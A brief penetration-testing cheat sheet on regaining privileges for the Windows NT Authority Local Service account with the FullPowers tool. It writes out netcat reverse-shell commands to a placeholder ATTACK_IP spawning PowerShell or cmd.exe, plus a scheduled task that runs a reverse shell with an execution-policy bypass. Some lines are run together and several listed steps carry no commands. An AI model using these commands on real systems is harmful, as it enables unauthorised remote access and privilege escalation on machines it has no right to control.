Recover privileges of NT Authority Local Service Account
Source: https://itm4n.github.io/localservice-privileges/ and https://github.com/itm4n/FullPowers
Steps:
whoami /privFullPowers.exe -c "C:\temp\nc64.exe ATTACK_IP PORT -e powershell" -z
OR
FullPowers -x whoami /privManual Exploitation
1) Create a scheduled task to make a connection back to our listener
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command '"C:\wamp\www\nc.exe ATTACK_IP PORT -e cmd.exe'""2) Give our Scheduled Task a name and register it on the system
3) Start our newly created Scheduled Task
4) Create a list of privileges
5) Create a Principal for the task
6) Create an action for the task
7) Create the task
8) Start the task
Last updated